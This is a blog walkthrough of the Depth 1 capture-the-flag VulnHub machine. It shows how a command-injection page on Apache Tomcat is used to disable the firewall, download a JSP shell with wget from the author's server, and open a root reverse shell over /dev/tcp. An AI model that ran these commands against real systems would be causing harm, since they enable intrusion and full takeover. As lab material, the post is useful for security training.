Capture the flag (CTF)

Depth 1 – CTF Walkthrough

November 24, 2017 by Chiragh Dewan

Depth 1 is a relatively new machine that surfaced on VulnHub on October 27th, 2017. It is created by Dan Lawson. It can be downloaded from https://www.vulnhub.com/entry/depth-1,213/

The objective of the machine is to gain root privileges and read the flag.

I will be using Kali 2017.1 as my target machine running on VirtualBox, and I will be running the victim machine, Depth 1, on VirtualBox as well.

Once booted, this is what the machine looks like:

After going through so many machines, I like the fact that the IP is displayed on the login.

Since we have the IP, let’s scan and see what all ports are open:

As we can see, an Apache Tomcat server is running on port 8080. Let’s head over there and see what’s happening:

I tried using the basic combination of the username and password to login via the Manager web app, but nothing worked:

I also tried using auxiliary/scanner/http/tomcat_mgr_login via Metasploit, but even that did not work:

I then decided to run Nikto, and see if that will show me something that I could use or not:

And it did. I went back to the web app and opened the file:

When I tried the command mentioned on the page, it gave me a result of the directory listing of the folder /tmp:

Exploring further, I see that the user Bill, has an ssh directory and a file called sudo_as_admin_successfull but when scanning for ports, I could not find port 22 open which could mean that there is a firewall in place:

However, before, I want to check the path of this page and see if there’s a way I can upload a JSP shell to it:

I run the following command to check the permission:

sh -c $@|sh . echo ssh bill@localhost sudo -l


The first thing I do is disable the firewall by:

sh -c $@|sh . echo ssh bill@localhost sudo ufw disable

Now that the firewall is down, it is time to upload a JSP shell.

I used the code from the following site: https://blog.netspi.com/hacking-with-jsp-shells/

Moreover, saved it as shell.jsp on my Desktop.

Next, I start a simple python HTTP server to host the file:

I will be uploading the file to the path where test.jsp is hosted which is: /var/lib/tomcat8/webapps/ROOT/

Next, I type the following command in test.jsp to upload the JSP shell:

sh -c $@|sh . echo ssh bill@localhost sudo wget “http://10.0.2.15:8000/shell.jsp” -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

and as you can see, our shell.jsp has been uploaded successfully:

Now it’s time to get a remote connection:

and on the shell, we write:

ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1

and we are root!! Here’s the flag:

Posted: November 24, 2017
Author
Chiragh Dewan
View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.

Leave a Reply

Your email address will not be published.